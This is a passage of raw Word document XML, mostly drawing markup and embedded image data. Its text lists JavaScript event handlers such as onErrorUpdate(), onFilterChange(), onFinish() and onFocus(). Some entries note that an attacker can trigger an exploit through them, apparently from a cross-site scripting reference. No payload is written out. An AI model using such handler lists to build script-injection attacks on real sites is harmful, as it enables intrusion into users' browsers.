                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 104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133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onErrorUpdate()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6" o:spid="_x0000_s1386" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:66.85pt;height:9.15pt;z-index:-17625600;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="133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">
                <v:shape id="Freeform 1048" o:spid="_x0000_s1387" style="position:absolute;left:1930;top:154;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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8R1MYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/oflil4KXWjiIboKj5aEHoQUxG8Ddkx&#10;2TY7G7Krxv76bqHQ23x8z5ktOluLK7XeOFYw6CcgiAunDZcKDh9vLykIH5A11o5JwZ08LOaPDzPM&#10;tLvxnq55KEUMYZ+hgiqEJpPSFxVZ9H3XEEfu7FqLIcK2lLrFWwy3tRwmyVhaNBwbKmxoXVHxlV+s&#10;gtfT8TAwn+/dpFznO5Pen79XG1Kq99QtpyACdeFf/Ofe6jg/GY3h95t4gp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8R1MYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,336;21,336;18,336;0,315;0,312;0,175;21,154;1316,154;1337,175;1337,315;1319,336;1316,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1047" o:spid="_x0000_s1388" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:133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ADMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQq91aRSbLs1ioiCIEjX7aHH6Wbc&#10;DW4m6ybq+u9NoeBtHu9zJrPeNeJMXbCeNbwMFQji0hvLlYbvYvX8DiJEZIONZ9JwpQCz6eBhgpnx&#10;F87pvIuVSCEcMtRQx9hmUoayJodh6FvixO195zAm2FXSdHhJ4a6RI6XG0qHl1FBjS4uaysPu5DTM&#10;fzhf2uP29yvf57YoPhRvxgetnx77+SeISH28i//da5Pmq9c3+Psmn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bQAz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onErrorUpdate()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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on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databound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>occurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>updating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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>associated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in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-37"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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926"/>
          <w:tab w:val="left" w:pos="1927"/>
        </w:tabs>
        <w:spacing w:before="86"/>
        <w:ind w:left="1926" w:hanging="1737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139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58420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="895350" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1042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5350" cy="116205"/>
                          <a:chOff x="1930" y="92"/>
                          <a:chExt cx="1410" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1043" name="Freeform 1045"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="92"/>
                            <a:ext cx="1410" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3319 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1410"/>
                              <a:gd name="T2" fmla="+- 0 274 92"/>
                              <a:gd name="T3" fmla="*/ 274 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1410"/>
                              <a:gd name="T6" fmla="+- 0 274 92"/>
                              <a:gd name="T7" fmla="*/ 274 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1410"/>
                              <a:gd name="T10" fmla="+- 0 274 92"/>
                              <a:gd name="T11" fmla="*/ 274 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1410"/>
                              <a:gd name="T14" fmla="+- 0 253 92"/>
                              <a:gd name="T15" fmla="*/ 253 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1410"/>
                              <a:gd name="T18" fmla="+- 0 250 92"/>
                              <a:gd name="T19" fmla="*/ 250 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1410"/>
                              <a:gd name="T22" fmla="+- 0 113 92"/>
                              <a:gd name="T23" fmla="*/ 113 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1410"/>
                              <a:gd name="T26" fmla="+- 0 92 92"/>
                              <a:gd name="T27" fmla="*/ 92 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3319 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1410"/>
                              <a:gd name="T30" fmla="+- 0 92 92"/>
                              <a:gd name="T31" fmla="*/ 92 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3340 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1410"/>
                              <a:gd name="T34" fmla="+- 0 113 92"/>
                              <a:gd name="T35" fmla="*/ 113 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3340 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1410"/>
                              <a:gd name="T38" fmla="+- 0 253 92"/>
                              <a:gd name="T39" fmla="*/ 253 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3322 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1410"/>
                              <a:gd name="T42" fmla="+- 0 274 92"/>
                              <a:gd name="T43" fmla="*/ 274 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3319 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1410"/>
                              <a:gd name="T46" fmla="+- 0 274 92"/>
                              <a:gd name="T47" fmla="*/ 27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10" h="183">
                                <a:moveTo>
                                  <a:pt x="138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89" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1392" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="138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" name="Text Box 104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92"/>
                            <a:ext cx="141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onFilterChange()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3" o:spid="_x0000_s1389" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4.6pt;width:70.5pt;height:9.15pt;z-index:-17625088;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,92" coordsize="141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">
                <v:shape id="Freeform 1045" o:spid="_x0000_s1390" style="position:absolute;left:1930;top:92;width:1410;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="141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Sg4sQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP30vDMBB+F/wfwgm+ucQpIl3TIcKmIMis9WFvt+Zs&#10;w5pLSbKt+++NIPh2H9/PK5eTG8SRQrSeNdzOFAji1hvLnYbmc3XzCCImZIODZ9JwpgjL6vKixML4&#10;E3/QsU6dyCEcC9TQpzQWUsa2J4dx5kfizH374DBlGDppAp5yuBvkXKkH6dBybuhxpOee2n19cBrU&#10;W7ef79bvX+12e94cmo19qYPV+vpqelqASDSlf/Gf+9Xk+er+Dn6/ySfI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0oOLEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1389,182l21,182r-3,l,161r,-3l,21,21,,1389,r21,21l1410,161r-18,21l1389,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1389,274;21,274;18,274;0,253;0,250;0,113;21,92;1389,92;1410,113;1410,253;1392,274;1389,274" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1044" o:spid="_x0000_s1391" type="#_x0000_t202" style="position:absolute;left:1930;top:92;width:141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nee8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aVIRsVujiCgUhNJ1e+hxuhl3&#10;g5vJuom6/vumIHibx/uc+bJ3jbhQF6xnDa8jBYK49MZypeG72A5nIEJENth4Jg03CrBcPA3mmBl/&#10;5Zwu+1iJFMIhQw11jG0mZShrchhGviVO3MF3DmOCXSVNh9cU7ho5VmoqHVpODTW2tK6pPO7PTsPq&#10;h/ONPX3+fuWH3BbFm+Ld9Kj1y3O/egcRqY8P8d39YdJ8NZnA/zfpB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nee8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onFilterChange()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>visual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>completes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>change)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420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:ind w:left="1420" w:hanging="1231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190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579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1039" name="Group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154"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1040" name="Freeform 1042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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912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" name="Text Box 104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onFinish()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0" o:spid="_x0000_s1392" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:45.6pt;height:9.15pt;z-index:-17624576;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1042" o:spid="_x0000_s1393" style="position:absolute;left:1930;top:154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Mm5sUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBBF3wv+wzKCb3WjFNtGV5HSqgWhVP2AITvN&#10;hmZnk+yq8e+dh0LfZrh37j2zWPW+VhfqYhXYwGScgSIugq24NHA6fjy+gIoJ2WIdmAzcKMJqOXhY&#10;YG7Dlb/pckilkhCOORpwKTW51rFw5DGOQ0Ms2k/oPCZZu1LbDq8S7ms9zbKZ9lixNDhs6M1R8Xs4&#10;ewPt5qsi3r5P2zaG52Oxd+7ztTdmNOzXc1CJ+vRv/rveWcHPnoRfvpER9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QybmxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,336;21,336;18,336;0,315;0,312;0,175;21,154;890,154;912,175;912,315;894,336;890,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1041" o:spid="_x0000_s1394" type="#_x0000_t202" style="position:absolute;left:1930;top:154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948MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aaIUsVujSKkgCMV1e+hxuhl3&#10;g5vJdhN1/feNIHibx/uc+bJ3jThTF6xnDeORAkFcemO50vBdrIczECEiG2w8k4YrBVgungZzzIy/&#10;cE7nfaxECuGQoYY6xjaTMpQ1OQwj3xIn7uA7hzHBrpKmw0sKd42cKDWVDi2nhhpb+qipPO5PTsPq&#10;h/NP+/f1u8sPuS2KN8Xb6VHrl+d+9Q4iUh8f4rt7Y9J89TqG2zfp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5948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onFinish()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>marquee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>finished</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>looping)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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1336" w:hanging="1147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241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525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1036" name="Group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167"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1037" name="Freeform 1039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349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 349 167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" name="Text Box 103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onFocus()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37" o:spid="_x0000_s1395" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:41.35pt;height:9.15pt;z-index:-17624064;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167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">
                <v:shape id="Freeform 1039" o:spid="_x0000_s1396" style="position:absolute;left:1930;top:167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YuB8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPyxS8SN2o0NboKj6Q9uAlqYjHITtN&#10;gtnZkF2T+O/dgtDbfHzPWa57U4mWGldaVjAZRyCIM6tLzhWcfg5vnyCcR9ZYWSYFd3KwXg1elhhr&#10;23FCbepzEULYxaig8L6OpXRZQQbd2NbEgfu1jUEfYJNL3WAXwk0lp1H0Lg2WHBoKrGlXUHZNb0bB&#10;cbvP54fzl7/I6Wk+ul62qLNEqeFrv1mA8NT7f/HT/a3D/Gj2AX/fhBP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WLgfEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,349;21,349;18,349;0,328;0,325;0,188;21,167;805,167;826,188;826,328;809,349;805,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1038" o:spid="_x0000_s1397" type="#_x0000_t202" style="position:absolute;left:1930;top:167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KnA8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUsDMRCF70L/Q5iCN5tUodi1aSlFQRDE7fbQ47iZ&#10;7oZuJusmtuu/dw6Ctxnem/e+WW3G0KkLDclHtjCfGVDEdXSeGwuH6uXuEVTKyA67yGThhxJs1pOb&#10;FRYuXrmkyz43SkI4FWihzbkvtE51SwHTLPbEop3iEDDLOjTaDXiV8NDpe2MWOqBnaWixp11L9Xn/&#10;HSxsj1w++6/3z4/yVPqqWhp+W5ytvZ2O2ydQmcb8b/67fnWCbx4EV76REf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4KnA8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onFocus()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
